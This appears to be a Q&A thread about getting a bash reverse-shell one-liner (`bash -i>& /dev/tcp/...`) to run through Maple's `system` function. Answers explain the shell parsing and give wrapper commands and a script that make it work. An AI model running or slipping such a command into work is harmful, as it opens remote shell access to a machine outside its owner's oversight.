# bash: &: No such file or directory

Tags: bash, macos, shell, terminal, maple

I am running the following command from maple (the function `system` works just like functions such as `os.system` from python):

```
system("bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1")
```

However, it fails and this is the output:

```
bash: no job control in this shell bash: &: No such file or directory
Exit Value: 127
```

The weird thing is that the command works great when calling it from Terminal...

Any suggestions of how I could fix this?

Comment: can you explain what you want to do? sounds like xy problem to me.

Comment: just want to be able to run the command without errors i guess... and the reason i want to run it, is for sending an interactive bash session to my server

Comment: Give the exact command you type in the software called maple. Without further information, and without knowing what this mysterious maple software is, we won't be able to help you.

Comment: I wish I could tell you more... but I do not really know what more I could tell because works just like a regular shell command when calling system commands from the software "maple"

Comment: Apparently it doesn't work like a regular shell command (otherwise it would work). Again, if you don't give us more information _in particular the exact line you typed (copy and paste exactly the relevant part of the code)_ we won't be able to help you. It's that simple.

Comment: Actually, make sure the shell maple uses is Bash. You're using Bash-only features here: the `>&` and `/dev/tcp` are Bash-specific—it won't work in, e.g., `sh`, which is very likely what your program uses as a shell.

Comment: okay the EXACT line is this: system("bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1") from the software maple. And yeah I think you are right but how can I fix that then, if possible? Thanks!!

Comment: Here is the function explained further: http://www.maplesoft.com/support/help/Maple/view.aspx?path=ssystem&term=ssystem but about your last reply - How could I fix that?

Comment: Can you try this? `system("bash -c \"bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1\"");`.

Comment: Thanks so much for your time! I did try it but the output said this: 
bash: /dev/tcp/myip/myport: No such file or directory
bash: 1: command not found

Exit Value: 127

Comment: You can also see my screen here: https://s27.postimg.org/wmvoi8yer/Screen_Shot_2017_01_01_at_10_39_58_PM.png and btw. there is connection to the server ip and port

Comment: I don't really understand why you want to do that via maple, actually. Anyway, I can't make it work from the GUI maple (`xmaple`) but it works well with the cli version of maple. I give up `:)`.

Comment: Hmm okay thanks anyway! But what exactly do you mean by "cli version"?

Comment: Maple has a version that you can run from the terminal. On Linux it's called `maple`, and the GUI version is called `xmaple`. The command I gave you works with the terminal version, but not with the graphical version… it's pretty strange `:)`.

Comment: So far so good. Thanks for your time!! At least I am getting closer to find the actual problem :)

Comment: The problem, for me, is that the symbol `>` doesn't get passed properly to the command in the GUI version. There are no problems with the cli version. So, what I can suggest, if you don't want to use the cli version, is that you put your command in a script, and launch this script.

Comment: Well great. I will check it out but the "no job control in this shell bash:", is that bad or can i just ignore it?

Comment: I just notice one problem with your code, which I missed before: You have a redirection `>&/dev/tcp/myownip/myport`, which IMO is incorrect, as you need a integral number to the right of the `&`, or the symbol `-`. Perhaps for this bash interprets the `&` as the _put into background_ operator, as in `foo & bar` (i.e. run `foo` in the background and immediately continue with the execution of `bar` in parallel). What exactly did you want to achieve with this redirection?

Answer (score 1):

"No job control" means that you can't bring background jobs into the foreground when running an interactive shell.

I would focus the analysis on the wording of the second error message. We know from it that *bash* is running. My guess is that Maple (not knowing the meaning of the `> WORD` construct in bash) tokenizes the string along the white space, and then does something like `execv("bash", "bash", "-i>0", "/dev/tcp/myownip/myport")`. At least this would explain the error message.

Could you try the following? Create a stand-alone two-line bash script like this:

```
#!/usr/bin/bash
bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1
```

Set it to executable, and then invoke it from Maple with

```
system("yourpath/yourscript")
```

At least the error message *No such file or directory* should be gone.

Comment: Nice one! This attempt works but ideally, I would run all the required commands from the 'system' command. Do you think there is a way to do that or is creating a script and running it the only way for now? Please share your thoughts :-) thanks!

Comment: The problem is to ensure, that the *whole string* `bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1` is interpreted as a bash command, which is in general not the case (unless Maple somehow 'knows' that system commands are executed by bash). You would run into the same problem, if you would have - say - an interactive C-Shell and would execute this command. It wouldn't work either, because C-Shell doesn't know about the redirection operators you are using, and the bash executable is started only **after** the redirection has bee set up.

Comment: @ThatGuy : One thing which you could try is to wrap everything in one other bash call: `system("bash -c 'bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1'")`.  The outer one would ensure that bash is running, and the whole "inner" command is then passed as argument to bash. If this doesn't work, I would expect that the solution can be found in the way Maple implements the `system` command. After all, you are doing something pretty special. Unfortunately, I don't know Maple and can't comment on this.

Comment: Thank you so much for your replies! I really appreciate your time! Anyway, i have already tried the `system("bash -c 'bash -i>& /dev/tcp/myownip/myport 0>&1 2>&1'")` but that did not work. The only thing that works for is the stand-alone file method. But i think that there really is something about the `>` symbol because I also tried running this command `echo "hello" >> ~/documents/text.txt` and that did not really work either. This could be because of a misunderstanding of the symbol `>` as when trying to run the bash command, right?

Comment: I think you have to first find out what Maple's `system` is actually doing when it gets passed an argument, i.e. how it interprets the string. This is not a trivial question, and while nearly all programming languages offer some form of a *system* functions, the logic behind it is far from trivial. In the simplest case, where the string contains just a single word, i.e. `system("yourscript")`, we can rely that the just exec *yourscript*. As soon as you have characters with certain interpretation to some shell (>>, &, ''), we need to learn how Maple interprets them.

Comment: @ThatGuy : Just to give you some idea: When you do a `system` in Ruby, and there is only a single argument to the function, Ruby first looks at certain environment variables to search for a suitable shell, and if it doesn't find one, spawns /bin/sh to run the program. Perl - to give an other example - first parses the string, and if the string does not contain a certain set of "special" characters, it splits the string on white space and invokes the first word directly; otherwise it chooses a shell dependent on the platform. Maple might do it still differently.